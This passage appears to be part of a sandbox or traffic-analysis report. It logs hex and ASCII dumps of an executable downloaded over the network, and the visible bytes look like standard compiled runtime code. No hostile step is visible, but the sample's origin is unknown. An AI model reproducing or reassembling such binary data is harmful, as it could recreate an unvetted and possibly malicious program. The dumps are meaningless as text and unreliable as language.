2023-10-13 13:21:12 UTC	307	IN	Data Raw: 56 56 e8 b7 ca ff ff 83 c4 14 eb 02 33 f6 68 08 1a 40 00 53 57 e8 33 46 00 00 83 c4 0c 85 c0 74 0d 56 56 56 56 56 e8 93 ca ff ff 83 c4 14 8b 45 fc ff 34 c5 a4 a6 80 00 53 57 e8 0e 46 00 00 83 c4 0c 85 c0 74 0d 56 56 56 56 56 e8 6e ca ff ff 83 c4 14 68 10 20 01 00 68 e0 19 40 00 57 e8 81 44 00 00 83 c4 0c eb 32 6a f4 ff 15 40 11 40 00 8b d8 3b de 74 24 83 fb ff 74 1f 6a 00 8d 45 f8 50 8d 34 fd a4 a6 80 00 ff 36 e8 96 cd ff ff 59 50 ff 36 53 ff 15 3c 11 40 00 5f 5e 5b c9 c3 6a 03 e8 d0 46 00 00 59 83 f8 01 74 15 6a 03 e8 c3 46 00 00 59 85 c0 75 1f 83 3d 24 a0 80 00 01 75 16 68 fc 00 00 00 e8 29 fe ff ff 68 ff 00 00 00 e8 1f fe ff ff 59 59 c3 c3 8b ff 55 8b ec 51 51 56 e8 5e ec ff ff 8b f0 85 f6 0f 84 46 01 00 00 8b 56 5c a1 64 a7 80 00 57 8b 7d 08 8b ca 53 Data Ascii: VV3h@SW3FtVVVVVE4SWFtVVVVVnh h@WD2j@@;t$tjEP46YP6S<@_^[jFYtjFYu=$uh)hYYUQQV^FV\dW}S
2023-10-13 13:21:12 UTC	309	IN	Data Raw: 75 fc 8b 55 fc 8d 45 f8 50 53 53 8d 7d f4 e8 0a fe ff ff 8b 45 f8 83 c4 0c 3d ff ff ff 3f 73 4a 8b 4d f4 83 f9 ff 73 42 8b f8 c1 e7 02 8d 04 0f 3b c1 72 36 50 e8 00 eb ff ff 8b f0 59 3b f3 74 29 8b 55 fc 8d 45 f8 50 03 fe 57 56 8d 7d f4 e8 c9 fd ff ff 8b 45 f8 83 c4 0c 48 a3 2c bf 80 00 89 35 30 bf 80 00 33 c0 eb 03 83 c8 ff 5f 5e 5b c9 c3 8b ff 55 8b ec a1 90 c3 80 00 83 ec 0c 53 56 8b 35 54 11 40 00 57 33 db 33 ff 3b c3 75 2e ff d6 8b f8 3b fb 74 0c c7 05 90 c3 80 00 01 00 00 00 eb 23 ff 15 5c 10 40 00 83 f8 78 75 0a 6a 02 58 a3 90 c3 80 00 eb 05 a1 90 c3 80 00 83 f8 01 0f 85 81 00 00 00 3b fb 75 0f ff d6 8b f8 3b fb 75 07 33 c0 e9 ca 00 00 00 8b c7 66 39 1f 74 0e 40 40 66 39 18 75 f9 40 40 66 39 18 75 f2 8b 35 50 11 40 00 53 53 53 2b c7 53 d1 f8 40 50 Data Ascii: uUEPSS}E=?sJMsB;r6PY;t)UEPWV}EH,503_^[USV5T@W33;u.;t#\@xujX;u;u3f9t@@f9u@@f9u5P@SSS+S@P
2023-10-13 13:21:12 UTC	310	IN	Data Raw: fd 8b 45 f8 8b 55 fc 5f 5e c9 c3 8b ff 55 8b ec b8 e4 1a 00 00 e8 a9 46 00 00 a1 88 a6 80 00 33 c5 89 45 fc 8b 45 0c 56 33 f6 89 85 34 e5 ff ff 89 b5 38 e5 ff ff 89 b5 30 e5 ff ff 39 75 10 75 07 33 c0 e9 e9 06 00 00 3b c6 75 27 e8 5e c1 ff ff 89 30 e8 44 c1 ff ff 56 56 56 56 56 c7 00 16 00 00 00 e8 cc c0 ff ff 83 c4 14 83 c8 ff e9 be 06 00 00 53 57 8b 7d 08 8b c7 c1 f8 05 8d 34 85 20 4b fa 02 8b 06 83 e7 1f c1 e7 06 03 c7 8a 58 24 02 db d0 fb 89 b5 28 e5 ff ff 88 9d 27 e5 ff ff 80 fb 02 74 05 80 fb 01 75 30 8b 4d 10 f7 d1 f6 c1 01 75 26 e8 f5 c0 ff ff 33 f6 89 30 e8 d9 c0 ff ff 56 56 56 56 56 c7 00 16 00 00 00 e8 61 c0 ff ff 83 c4 14 e9 43 06 00 00 f6 40 04 20 74 11 6a 02 6a 00 6a 00 ff 75 08 e8 97 fe ff ff 83 c4 10 ff 75 08 e8 20 07 00 00 59 85 c0 0f 84 Data Ascii: EU_^UF3EEV34809uu3;u'^0DVVVVVSW}4 KX$('tu0Mu&30VVVVVaC@ tjjjuu Y
2023-10-13 13:21:12 UTC	311	IN	Data Raw: ff 2b 85 34 e5 ff ff 3b 45 10 0f 82 3f ff ff ff e9 40 01 00 00 39 4d 10 0f 86 7c 01 00 00 8b 8d 44 e5 ff ff 83 a5 3c e5 ff ff 00 2b 8d 34 e5 ff ff 6a 02 8d 85 48 f9 ff ff 5e 3b 4d 10 73 3c 8b 95 44 e5 ff ff 0f b7 12 01 b5 44 e5 ff ff 03 ce 66 83 fa 0a 75 0e 6a 0d 5b 66 89 18 03 c6 01 b5 3c e5 ff ff 01 b5 3c e5 ff ff 66 89 10 03 c6 81 bd 3c e5 ff ff a8 06 00 00 72 bf 33 f6 56 56 68 55 0d 00 00 8d 8d f0 eb ff ff 51 8d 8d 48 f9 ff ff 2b c1 99 2b c2 d1 f8 50 8b c1 50 56 68 e9 fd 00 00 ff 15 50 11 40 00 8b d8 3b de 0f 84 97 00 00 00 6a 00 8d 85 2c e5 ff ff 50 8b c3 2b c6 50 8d 84 35 f0 eb ff ff 50 8b 85 28 e5 ff ff 8b 00 ff 34 07 ff 15 3c 11 40 00 85 c0 74 0c 03 b5 2c e5 ff ff 3b de 7f cb eb 0c ff 15 5c 10 40 00 89 85 40 e5 ff ff 3b de 7f 5c 8b 85 44 e5 ff ff Data Ascii: +4;E?@9M\|D<+4jH^;Ms<DDfuj[f<<f<r3VVhUQH++PPVhP@;j,P+P5P(4<@t,;\@@;\D
2023-10-13 13:21:12 UTC	313	IN	Data Raw: 8a 40 00 00 83 c4 24 33 c0 0f b7 8c 45 fc fa ff ff f6 c1 01 74 0e 80 4c 06 1d 10 8a 8c 05 fc fd ff ff eb 11 f6 c1 02 74 15 80 4c 06 1d 20 8a 8c 05 fc fc ff ff 88 8c 06 1d 01 00 00 eb 08 c6 84 06 1d 01 00 00 00 40 3b c7 72 be eb 56 8d 86 1d 01 00 00 c7 85 e4 fa ff ff 9f ff ff ff 33 c9 29 85 e4 fa ff ff 8b 95 e4 fa ff ff 8d 84 0e 1d 01 00 00 03 d0 8d 5a 20 83 fb 19 77 0c 80 4c 0e 1d 10 8a d1 80 c2 20 eb 0f 83 fa 19 77 0e 80 4c 0e 1d 20 8a d1 80 ea 20 88 10 eb 03 c6 00 00 41 3b cf 72 c2 8b 4d fc 5f 33 cd 5b e8 50 08 00 00 c9 c3 6a 0c 68 38 8a 80 00 e8 e1 cf ff ff e8 24 d8 ff ff 8b f8 a1 cc ac 80 00 85 47 70 74 1d 83 7f 6c 00 74 17 8b 77 68 85 f6 75 08 6a 20 e8 8c dc ff ff 59 8b c6 e8 f9 cf ff ff c3 6a 0d e8 b3 c4 ff ff 59 83 65 fc 00 8b 77 68 89 75 e4 3b 35 Data Ascii: @$3EtLtL @;rV3)Z wL wL A;rM_3[Pjh8$Gptltwhuj YjYewhu;5
2023-10-13 13:21:12 UTC	314	IN	Data Raw: 6a fd e8 56 fe ff ff 59 c7 05 50 5c fa 02 01 00 00 00 33 c0 c3 8b ff 55 8b ec 53 56 8b 75 08 8b 86 bc 00 00 00 33 db 57 3b c3 74 6f 3d e8 ae 80 00 74 68 8b 86 b0 00 00 00 3b c3 74 5e 39 18 75 5a 8b 86 b8 00 00 00 3b c3 74 17 39 18 75 13 50 e8 20 aa ff ff ff b6 bc 00 00 00 e8 f0 3e 00 00 59 59 8b 86 b4 00 00 00 3b c3 74 17 39 18 75 13 50 e8 ff a9 ff ff ff b6 bc 00 00 00 e8 8a 3e 00 00 59 59 ff b6 b0 00 00 00 e8 e7 a9 ff ff ff b6 bc 00 00 00 e8 dc a9 ff ff 59 59 8b 86 c0 00 00 00 3b c3 74 44 39 18 75 40 8b 86 c4 00 00 00 2d fe 00 00 00 50 e8 bb a9 ff ff 8b 86 cc 00 00 00 bf 80 00 00 00 2b c7 50 e8 a8 a9 ff ff 8b 86 d0 00 00 00 2b c7 50 e8 9a a9 ff ff ff b6 c0 00 00 00 e8 8f a9 ff ff 83 c4 10 8d be d4 00 00 00 8b 07 3d 28 ae 80 00 74 17 39 98 b4 00 00 00 75 Data Ascii: jVYP\3USVu3W;to=th;t^9uZ;t9uP >YY;t9uP>YYYY;tD9u@-P+P+P=(t9u
2023-10-13 13:21:12 UTC	315	IN	Data Raw: f0 b8 01 00 00 00 0f a2 89 55 fc 89 45 f8 5b f7 45 fc 00 00 00 04 74 0e e8 5c ff ff ff 85 c0 74 05 33 c0 40 eb 02 33 c0 5b c9 c3 e8 99 ff ff ff a3 14 4b fa 02 33 c0 c3 8b ff 55 8b ec 83 ec 10 56 ff 75 0c 8d 4d f0 e8 53 aa ff ff 8b 75 08 0f be 06 50 e8 45 3f 00 00 83 f8 65 eb 0c 46 0f b6 06 50 e8 f3 3d 00 00 85 c0 59 75 f1 0f be 06 50 e8 28 3f 00 00 59 83 f8 78 75 02 46 46 8b 4d f0 8b 89 bc 00 00 00 8b 09 8a 06 8a 09 88 0e 46 8a 0e 88 06 8a c1 8a 0e 46 84 c9 75 f3 5e 38 4d fc 74 07 8b 45 f8 83 60 70 fd c9 c3 8b ff 55 8b ec 83 ec 10 56 ff 75 0c 8d 4d f0 e8 e0 a9 ff ff 8b 45 08 8a 08 8b 75 f0 84 c9 74 15 8b 96 bc 00 00 00 8b 12 8a 12 3a ca 74 07 40 8a 08 84 c9 75 f5 8a 08 40 84 c9 74 36 eb 0b 80 f9 65 74 0c 80 f9 45 74 07 40 8a 08 84 c9 75 ef 8b d0 48 80 38 Data Ascii: UE[Et\t3@3[K3UVuMSuPE?eFP=YuP(?YxuFFMFFu^8MtE`pUVuMEut:t@u@t6etEt@uH8
2023-10-13 13:21:12 UTC	317	IN	Data Raw: 02 00 00 83 7d 18 00 0f 94 c1 fe c9 80 e1 e0 80 c1 70 88 08 c6 40 03 00 e9 32 02 00 00 25 00 00 00 80 33 c9 0b c8 74 04 c6 06 2d 46 8b 5d 18 c6 06 30 46 85 db 0f 94 c0 fe c8 24 e0 04 78 88 06 8b 4f 04 46 f7 db 1b db 83 e3 e0 81 e1 00 00 f0 7f 33 c0 83 c3 27 33 d2 0b c1 75 21 c6 06 30 8b 4f 04 8b 07 81 e1 ff ff 0f 00 46 0b c1 75 05 89 55 ec eb 0d c7 45 ec fe 03 00 00 eb 04 c6 06 31 46 8b c6 46 89 45 0c 39 55 14 75 04 88 10 eb 0f 8b 4d dc 8b 89 bc 00 00 00 8b 09 8a 09 88 08 8b 4f 04 8b 07 81 e1 ff ff 0f 00 89 4d f8 77 08 3b c2 0f 86 b5 00 00 00 89 55 f4 c7 45 f8 00 00 0f 00 83 7d 14 00 7e 4d 8b 57 04 23 55 f8 8b 07 0f bf 4d fc 23 45 f4 81 e2 ff ff 0f 00 e8 d2 3d 00 00 66 83 c0 30 0f b7 c0 66 83 f8 39 76 02 03 c3 8b 4d f8 83 6d fc 04 88 06 8b 45 f4 0f ac c8 Data Ascii: }p@2%3t-F]0F$xOF3'3u!0OFuUE1FFE9UuMOMw;UE}~MW#UM#E=f0f9vMmE
2023-10-13 13:21:12 UTC	318	IN	Data Raw: 75 08 e8 b5 fe ff ff eb 30 ff 75 20 ff 75 1c ff 75 18 ff 75 10 ff 75 0c ff 75 08 e8 77 f9 ff ff eb 17 ff 75 20 ff 75 1c ff 75 18 ff 75 10 ff 75 0c ff 75 08 e8 6e f8 ff ff 83 c4 18 5d c3 8b ff 55 8b ec 6a 00 ff 75 1c ff 75 18 ff 75 14 ff 75 10 ff 75 0c ff 75 08 e8 5a ff ff ff 83 c4 1c 5d c3 8b ff 56 68 00 00 03 00 68 00 00 01 00 33 f6 56 e8 03 39 00 00 83 c4 0c 85 c0 74 0d 56 56 56 56 56 e8 fc 9f ff ff 83 c4 14 5e c3 8b ff 55 8b ec 83 ec 18 dd 05 c0 1b 40 00 dd 5d f0 dd 05 b8 1b 40 00 dd 5d e8 dd 45 e8 dc 75 f0 dc 4d f0 dc 6d e8 dd 5d f8 d9 e8 dc 5d f8 df e0 f6 c4 05 7a 05 33 c0 40 c9 c3 33 c0 c9 c3 68 e4 1b 40 00 ff 15 80 11 40 00 85 c0 74 15 68 c8 1b 40 00 50 ff 15 60 10 40 00 85 c0 74 05 6a 00 ff d0 c3 e9 99 ff ff ff 8b ff 55 8b ec 8b 45 08 a3 dc c3 80 Data Ascii: u0u uuuuuwu uuuuun]UjuuuuuuZ]Vhh3V9tVVVVV^U@]@]EuMm]]z3@3h@@th@P`@tjUE
2023-10-13 13:21:12 UTC	319	IN	Data Raw: 5f 5e 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 8b ff 55 8b ec 6a fe 68 d8 8a 80 00 68 30 5a 40 00 64 a1 00 00 00 00 50 83 ec 08 53 56 57 a1 88 a6 80 00 31 45 f8 33 c5 50 8d 45 f0 64 a3 00 00 00 00 89 65 e8 c7 45 fc 00 00 00 00 68 00 00 40 00 e8 2a ff ff ff 83 c4 04 85 c0 74 55 8b 45 08 2d 00 00 40 00 50 68 00 00 40 00 e8 50 ff ff ff 83 c4 08 85 c0 74 3b 8b 40 24 c1 e8 1f f7 d0 83 e0 01 c7 45 fc fe ff ff ff 8b 4d f0 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c3 8b 45 ec 8b 08 8b 01 33 d2 3d 05 00 00 c0 0f 94 c2 8b c2 c3 8b 65 e8 c7 45 fc fe ff ff ff 33 c0 8b 4d f0 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c3 8b ff 55 8b ec 83 ec 18 53 ff 75 10 8d 4d e8 e8 b2 99 ff ff 8b 5d 08 8d 43 01 3d 00 01 00 00 77 0f 8b 45 e8 8b 80 c8 00 00 00 0f b7 04 58 eb 75 89 Data Ascii: _^[]Ujhh0Z@dPSVW1E3PEdeEh@*tUE-@Ph@Pt;@$EMdY_^[]E3=eE3MdY_^[]USuM]C=wEXu
2023-10-13 13:21:12 UTC	321	IN	Data Raw: 00 00 83 fb 08 75 2e 8b 0d 58 a7 80 00 89 4d dc 8b 0d 5c a7 80 00 8b 15 58 a7 80 00 03 ca 39 4d dc 7d 19 8b 4d dc 6b c9 0c 8b 57 5c 89 44 11 08 ff 45 dc eb db e8 41 b6 ff ff 89 06 c7 45 fc fe ff ff ff e8 15 00 00 00 83 fb 08 75 1f ff 77 64 53 ff 55 e0 59 eb 19 8b 5d 08 8b 7d d8 83 7d e4 00 74 08 6a 00 e8 4b a4 ff ff 59 c3 53 ff 55 e0 59 83 fb 08 74 0a 83 fb 0b 74 05 83 fb 04 75 11 8b 45 d4 89 47 60 83 fb 08 75 06 8b 45 d0 89 47 64 33 c0 e8 35 b0 ff ff c3 8b ff 55 8b ec 8b 45 08 a3 f4 c3 80 00 5d c3 8b ff 55 8b ec 8b 45 08 a3 00 c4 80 00 5d c3 6a 10 68 38 8b 80 00 e8 c5 af ff ff 33 db 89 5d e4 6a 01 e8 c0 a4 ff ff 59 89 5d fc 6a 03 5f 89 7d e0 3b 3d 40 5c fa 02 7d 57 8b f7 c1 e6 02 a1 20 4c fa 02 03 c6 39 18 74 44 8b 00 f6 40 0c 83 74 0f 50 e8 15 30 00 00 Data Ascii: u.XM\X9M}MkW\DEAEuwdSUY]}}tjKYSUYttuEG`uEGd35UE]UE]jh83]jY]j_};=@\}W L9tD@tP0
2023-10-13 13:21:12 UTC	322	IN	Data Raw: 75 34 8b 36 8b c6 c1 f8 05 8b 04 85 20 4b fa 02 83 e6 1f c1 e6 06 8d 44 30 04 80 20 fe ff 15 5c 10 40 00 50 e8 05 92 ff ff 59 e8 d9 91 ff ff 8b 00 e9 74 04 00 00 ff 75 e4 ff 15 5c 11 40 00 3b c3 75 44 8b 36 8b c6 c1 f8 05 8b 04 85 20 4b fa 02 83 e6 1f c1 e6 06 8d 44 30 04 80 20 fe ff 15 5c 10 40 00 8b f0 56 e8 c2 91 ff ff 59 ff 75 e4 ff 15 8c 11 40 00 3b f3 75 b0 e8 89 91 ff ff c7 00 0d 00 00 00 eb a3 83 f8 02 75 06 80 4d ff 40 eb 09 83 f8 03 75 04 80 4d ff 08 ff 75 e4 ff 36 e8 af 10 00 00 8b 06 8b d0 83 e0 1f c1 fa 05 8b 14 95 20 4b fa 02 59 c1 e0 06 59 8a 4d ff 80 c9 01 88 4c 02 04 8b 06 8b d0 83 e0 1f c1 fa 05 8b 14 95 20 4b fa 02 c1 e0 06 8d 44 02 24 80 20 80 88 4d fd 80 65 fd 48 88 4d ff 0f 85 80 00 00 00 f6 c1 80 0f 84 b1 02 00 00 f6 45 10 02 74 71 Data Ascii: u46 KD0 \@PYtu\@;uD6 KD0 \@VYu@;uuM@uMu6 KYYML KD$ MeHMEtq
2023-10-13 13:21:12 UTC	323	IN	Data Raw: 8b c8 c1 f9 05 83 e0 1f c1 e0 06 8b 0c 8d 20 4b fa 02 8d 44 01 04 80 20 fe ff 37 e8 f9 0d 00 00 59 c3 8b ff 55 8b ec 6a 01 ff 75 08 ff 75 18 ff 75 14 ff 75 10 ff 75 0c e8 19 ff ff ff 83 c4 18 5d c3 8b ff 55 8b ec 83 ec 18 53 ff 75 14 8d 4d e8 e8 33 8a ff ff 33 db 39 5d 10 75 13 38 5d f4 74 07 8b 45 f0 83 60 70 fd 33 c0 e9 e6 01 00 00 8b 45 ec 39 58 08 75 26 ff 75 10 ff 75 0c ff 75 08 e8 76 32 00 00 83 c4 0c 38 5d f4 0f 84 c4 01 00 00 8b 4d f0 83 61 70 fd e9 b8 01 00 00 39 5d 08 75 2e e8 07 8c ff ff 53 53 53 53 53 c7 00 16 00 00 00 e8 8f 8b ff ff 83 c4 14 38 5d f4 74 07 8b 45 f0 83 60 70 fd b8 ff ff ff 7f e9 85 01 00 00 57 8b 7d 0c 3b fb 75 2e e8 d1 8b ff ff 53 53 53 53 53 c7 00 16 00 00 00 e8 59 8b ff ff 83 c4 14 38 5d f4 74 07 8b 45 f0 83 60 70 fd b8 ff Data Ascii: KD 7YUjuuuuu]USuM339]u8]tE`p3E9Xu&uuuv28]Map9]u.SSSSS8]tE`pW};u.SSSSSY8]tE`p
2023-10-13 13:21:12 UTC	325	IN	Data Raw: 83 3d 44 c4 80 00 00 8b d8 0f 85 8e 00 00 00 68 6c 23 40 00 ff 15 88 11 40 00 8b f8 85 ff 0f 84 2a 01 00 00 8b 35 60 10 40 00 68 60 23 40 00 57 ff d6 85 c0 0f 84 14 01 00 00 50 e8 be a5 ff ff c7 04 24 50 23 40 00 57 a3 44 c4 80 00 ff d6 50 e8 a9 a5 ff ff c7 04 24 3c 23 40 00 57 a3 48 c4 80 00 ff d6 50 e8 94 a5 ff ff c7 04 24 20 23 40 00 57 a3 4c c4 80 00 ff d6 50 e8 7f a5 ff ff 59 a3 54 c4 80 00 85 c0 74 14 68 08 23 40 00 57 ff d6 50 e8 67 a5 ff ff 59 a3 50 c4 80 00 a1 50 c4 80 00 3b c3 74 4f 39 1d 54 c4 80 00 74 47 50 e8 c5 a5 ff ff ff 35 54 c4 80 00 8b f0 e8 b8 a5 ff ff 59 59 8b f8 85 f6 74 2c 85 ff 74 28 ff d6 85 c0 74 19 8d 4d f8 51 6a 0c 8d 4d ec 51 6a 01 50 ff d7 85 c0 74 06 f6 45 f4 01 75 09 81 4d 10 00 00 20 00 eb 39 a1 48 c4 80 00 3b c3 74 30 50 Data Ascii: =Dhl#@@*5`@h`#@WP$P#@WDP$<#@WHP$ #@WLPYTth#@WPgYPP;tO9TtGP5TYYt,t(tMQjMQjPtEuM 9H;t0P
2023-10-13 13:21:12 UTC	326	IN	Data Raw: d8 be 40 00 00 bf 40 00 8a 46 03 23 d1 88 47 03 83 ee 01 c1 e9 02 83 ef 01 83 f9 08 72 b2 fd f3 a5 fc ff 24 95 a0 bf 40 00 8d 49 00 8a 46 03 23 d1 88 47 03 8a 46 02 c1 e9 02 88 47 02 83 ee 02 83 ef 02 83 f9 08 72 88 fd f3 a5 fc ff 24 95 a0 bf 40 00 90 8a 46 03 23 d1 88 47 03 8a 46 02 88 47 02 8a 46 01 c1 e9 02 88 47 01 83 ee 03 83 ef 03 83 f9 08 0f 82 56 ff ff ff fd f3 a5 fc ff 24 95 a0 bf 40 00 8d 49 00 54 bf 40 00 5c bf 40 00 64 bf 40 00 6c bf 40 00 74 bf 40 00 7c bf 40 00 84 bf 40 00 97 bf 40 00 8b 44 8e 1c 89 44 8f 1c 8b 44 8e 18 89 44 8f 18 8b 44 8e 14 89 44 8f 14 8b 44 8e 10 89 44 8f 10 8b 44 8e 0c 89 44 8f 0c 8b 44 8e 08 89 44 8f 08 8b 44 8e 04 89 44 8f 04 8d 04 8d 00 00 00 00 03 f0 03 f8 ff 24 95 a0 bf 40 00 8b ff b0 bf 40 00 b8 bf 40 00 c8 bf 40 Data Ascii: @@F#Gr$@IF#GFGr$@F#GFGFGV$@IT@\@d@l@t@\|@@@DDDDDDDDDDDDDD$@@@@
2023-10-13 13:21:12 UTC	327	IN	Data Raw: f8 ff 75 07 b8 ff ff 00 00 eb 70 56 8d 4d f0 51 6a 01 8d 4d 08 51 50 ff 15 a0 11 40 00 85 c0 75 67 83 3d 10 ae 80 00 02 75 da ff 15 5c 10 40 00 83 f8 78 75 cf 89 35 10 ae 80 00 56 56 6a 05 8d 45 f4 50 6a 01 8d 45 08 50 56 ff 15 9c 11 40 00 50 ff 15 50 11 40 00 8b 0d 34 b0 80 00 83 f9 ff 74 a2 56 8d 55 f0 52 50 8d 45 f4 50 51 ff 15 98 11 40 00 85 c0 74 8d 66 8b 45 08 8b 4d fc 33 cd 5e e8 a6 cd ff ff c9 c3 c7 05 10 ae 80 00 01 00 00 00 eb e3 8b ff 55 8b ec 83 ec 10 53 56 8b 75 0c 33 db 3b f3 74 15 39 5d 10 74 10 38 1e 75 12 8b 45 08 3b c3 74 05 33 c9 66 89 08 33 c0 5e 5b c9 c3 ff 75 14 8d 4d f0 e8 b1 79 ff ff 8b 45 f0 39 58 14 75 1f 8b 45 08 3b c3 74 07 66 0f b6 0e 66 89 08 38 5d fc 74 07 8b 45 f8 83 60 70 fd 33 c0 40 eb ca 8d 45 f0 50 0f b6 06 50 e8 e0 cc Data Ascii: upVMQjMQP@ug=u\@xu5VVjEPjEPV@PP@4tVURPEPQ@tfEM3^USVu3;t9]t8uE;t3f3^[uMyE9XuE;tff8]tE`p3@EPP
2023-10-13 13:21:12 UTC	329	IN	Data Raw: 83 c4 18 f7 de 1b f6 23 75 f8 57 e8 8d fc ff ff 59 eb 1a ff 75 1c ff 75 18 ff 75 14 ff 75 10 ff 75 0c ff 75 08 ff 15 a8 11 40 00 8b f0 39 5d f4 74 09 ff 75 f4 e8 68 6f ff ff 59 8b 45 f0 3b c3 74 0c 39 45 18 74 07 50 e8 55 6f ff ff 59 8b c6 8d 65 e0 5f 5e 5b 8b 4d fc 33 cd e8 73 c8 ff ff c9 c3 8b ff 55 8b ec 83 ec 10 ff 75 08 8d 4d f0 e8 b0 74 ff ff ff 75 28 8d 4d f0 ff 75 24 ff 75 20 ff 75 1c ff 75 18 ff 75 14 ff 75 10 ff 75 0c e8 28 fc ff ff 83 c4 20 80 7d fc 00 74 07 8b 4d f8 83 61 70 fd c9 c3 8b ff 55 8b ec 51 51 a1 88 a6 80 00 33 c5 89 45 fc a1 5c c4 80 00 53 56 33 db 57 8b f9 3b c3 75 3a 8d 45 f8 50 33 f6 46 56 68 78 23 40 00 56 ff 15 b4 11 40 00 85 c0 74 08 89 35 5c c4 80 00 eb 34 ff 15 5c 10 40 00 83 f8 78 75 0a 6a 02 58 a3 5c c4 80 00 eb 05 a1 5c Data Ascii: #uWYuuuuuu@9]tuhoYE;t9EtPUoYe_^[M3sUuMtu(Mu$u uuuuu( }tMapUQQ3E\SV3W;u:EP3FVhx#@V@t5\4\@xujX\\
2023-10-13 13:21:12 UTC	330	IN	Data Raw: ff 55 8b ec 51 83 65 fc 00 53 8b 5d 10 85 db 75 07 33 c0 e9 9a 00 00 00 57 83 fb 04 72 75 8d 7b fc 85 ff 76 6e 8b 4d 0c 8b 45 08 8a 10 83 c0 04 83 c1 04 84 d2 74 52 3a 51 fc 75 4d 8a 50 fd 84 d2 74 3c 3a 51 fd 75 37 8a 50 fe 84 d2 74 26 3a 51 fe 75 21 8a 50 ff 84 d2 74 10 3a 51 ff 75 0b 83 45 fc 04 39 7d fc 72 c2 eb 3f 0f b6 40 ff 0f b6 49 ff eb 46 0f b6 40 fe 0f b6 49 fe eb 3c 0f b6 40 fd 0f b6 49 fd eb 32 0f b6 40 fc 0f b6 49 fc eb 28 8b 4d 0c 8b 45 08 eb 0f 8a 10 84 d2 74 14 3a 11 75 10 40 41 ff 45 fc 39 5d fc 72 ec 33 c0 5f 5b c9 c3 0f b6 00 0f b6 09 2b c1 eb f2 cc cc cc cc cc cc cc cc cc cc 55 8b ec 56 33 c0 50 50 50 50 50 50 50 50 8b 55 0c 8d 49 00 8a 02 0a c0 74 09 83 c2 01 0f ab 04 24 eb f1 8b 75 08 8b ff 8a 06 0a c0 74 0c 83 c6 01 0f a3 04 24 73 Data Ascii: UQeS]u3Wru{vnMEtR:QuMPt<:Qu7Pt&:Qu!Pt:QuE9}r?@IF@I<@I2@I(MEt:u@AE9]r3_[+UV3PPPPPPPPUIt$ut$s
2023-10-13 13:21:12 UTC	331	IN	Data Raw: 70 fd 6a 03 58 eb 2f 83 f8 02 75 1c 38 5d e8 74 07 8b 45 e4 83 60 70 fd 6a 04 eb e8 f6 45 ec 01 75 ea f6 45 ec 02 75 ce 38 5d e8 74 07 8b 45 e4 83 60 70 fd 33 c0 8b 4d fc 5f 5e 33 cd 5b e8 de bd ff ff c9 c3 8b ff 55 8b ec 83 ec 28 a1 88 a6 80 00 33 c5 89 45 fc 53 56 8b 75 08 57 ff 75 10 8b 7d 0c 8d 4d dc e8 08 6a ff ff 8d 45 dc 50 33 db 53 53 53 53 57 8d 45 d8 50 8d 45 f0 50 e8 c1 1f 00 00 89 45 ec 8d 45 f0 56 50 e8 70 1a 00 00 83 c4 28 f6 45 ec 03 75 2b 83 f8 01 75 11 38 5d e8 74 07 8b 45 e4 83 60 70 fd 6a 03 58 eb 2f 83 f8 02 75 1c 38 5d e8 74 07 8b 45 e4 83 60 70 fd 6a 04 eb e8 f6 45 ec 01 75 ea f6 45 ec 02 75 ce 38 5d e8 74 07 8b 45 e4 83 60 70 fd 33 c0 8b 4d fc 5f 5e 33 cd 5b e8 36 bd ff ff c9 c3 8b ff 55 8b ec 8b 4d 14 53 56 8b 75 08 33 db 57 8b 79 Data Ascii: pjX/u8]tE`pjEuEu8]tE`p3M_^3[U(3ESVuWu}MjEP3SSSSWEPEPEEVPp(Eu+u8]tE`pjX/u8]tE`pjEuEu8]tE`p3M_^3[6UMSVu3Wy
2023-10-13 13:21:12 UTC	333	IN	Data Raw: 2b d1 89 55 ec 03 d8 2b d9 89 5d f0 8b 75 ec 8b 7d f0 8b 4d e8 f3 a4 8b 45 08 eb 53 3b cf 75 35 f7 d9 83 c1 10 89 4d e4 8b 75 0c 8b 7d 08 8b 4d e4 f3 a4 8b 4d 08 03 4d e4 8b 55 0c 03 55 e4 8b 45 10 2b 45 e4 50 52 51 e8 4c ff ff ff 83 c4 0c 8b 45 08 eb 1a 8b 75 0c 8b 7d 08 8b 4d 10 8b d1 c1 e9 02 f3 a5 8b ca 83 e1 03 f3 a4 8b 45 08 8b 5d fc 8b 75 f8 8b 7d f4 8b e5 5d c3 8b ff 55 8b ec 53 56 8b 75 08 57 33 ff 83 cb ff 3b f7 75 1c e8 ab 66 ff ff 57 57 57 57 57 c7 00 16 00 00 00 e8 33 66 ff ff 83 c4 14 0b c3 eb 42 f6 46 0c 83 74 37 56 e8 7d d0 ff ff 56 8b d8 e8 84 2e 00 00 56 e8 5c ad ff ff 50 e8 98 09 00 00 83 c4 10 85 c0 7d 05 83 cb ff eb 11 8b 46 1c 3b c7 74 0a 50 e8 b2 5e ff ff 59 89 7e 1c 89 7e 0c 8b c3 5f 5e 5b 5d c3 6a 0c 68 e8 8b 80 00 e8 68 7f ff ff Data Ascii: +U+]u}MES;u5Mu}MMMUUE+EPRQLEu}ME]u}]USVuW3;ufWWWWW3fBFt7V}V.V\P}F;tP^Y~~_^[]jhh
2023-10-13 13:21:12 UTC	334	IN	Data Raw: 00 00 6a 01 53 53 ff 75 08 e8 c3 9f ff ff 8b 0f 89 44 0e 28 8b 45 f4 83 c4 10 89 54 0e 2c 8b 0f 03 ce f6 41 04 48 74 74 8a 49 05 80 f9 0a 74 6c 39 5d 10 74 67 88 08 8b 0f 40 ff 4d 10 c7 45 f0 01 00 00 00 c6 44 0e 05 0a 38 5d fe 74 4e 8b 0f 8a 4c 0e 25 80 f9 0a 74 43 39 5d 10 74 3e 88 08 8b 0f 40 ff 4d 10 80 7d fe 01 c7 45 f0 02 00 00 00 c6 44 0e 25 0a 75 24 8b 0f 8a 4c 0e 26 80 f9 0a 74 19 39 5d 10 74 14 88 08 8b 0f 40 ff 4d 10 c7 45 f0 03 00 00 00 c6 44 0e 26 0a 53 8d 4d e8 51 ff 75 10 50 8b 07 ff 34 06 ff 15 b8 10 40 00 85 c0 0f 84 7b 03 00 00 8b 4d e8 3b cb 0f 8c 70 03 00 00 3b 4d 10 0f 87 67 03 00 00 8b 07 01 4d f0 8d 44 06 04 f6 00 80 0f 84 e6 01 00 00 80 7d fe 02 0f 84 16 02 00 00 3b cb 74 0d 8b 4d f4 80 39 0a 75 05 80 08 04 eb 03 80 20 fb 8b 5d f4 Data Ascii: 